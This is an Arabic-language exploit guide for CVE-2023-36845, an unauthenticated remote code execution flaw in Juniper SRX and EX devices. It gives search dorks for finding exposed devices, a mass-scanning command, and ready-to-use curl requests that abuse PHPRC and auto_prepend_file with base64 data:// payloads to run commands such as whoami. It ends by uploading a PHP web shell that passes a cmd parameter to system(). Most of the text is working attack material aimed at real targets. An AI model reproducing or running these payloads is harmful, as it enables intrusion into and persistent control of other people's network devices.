
استغلال لـ CVE-2023-36845، ثغرة معالجة متغيرات بيئة PHP في Juniper SRX/EX، يتيح تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه عبر طلبات HTTP مصممة.
تمثل CVE-2023-36845 ثغرة بارزة في معالجة متغيرات بيئة PHP تؤثر على جدران الحماية Juniper SRX ومفاتيح EX. على الرغم من أن Juniper صنفت هذه الثغرة على أنها متوسطة الخطورة، إلا أننا في هذه المقالة سنوضح كيف يمكن استغلال هذه الثغرة الواحدة لتنفيذ أوامر عن بعد دون مصادقة.
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
الكشف
python3 CVE-2023-36845.py -f targets.txt -o output.txt
من الممكن استخدام أي غلاف بروتوكول (protocol wrapper) مع auto_prepend_file. الخيار الأنسب لهذه العملية هو بروتوكول data://، والذي يسمح بتقديم "الملف الثانوي" مباشرة في السطر. إليك تمثيل متطور لهذا الاستغلال، ينفذ الكود المضمن <? phpinfo(); ?> داخل مخطط data://:
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
تنفيذ أمر whoami
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
رفع ملف
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| المعلمة | الوصف | النوع |
|---|---|---|
| --file / -f | ملف الأهداف المدخلة | ملف |
| -o | ملف الإخراج | ملف |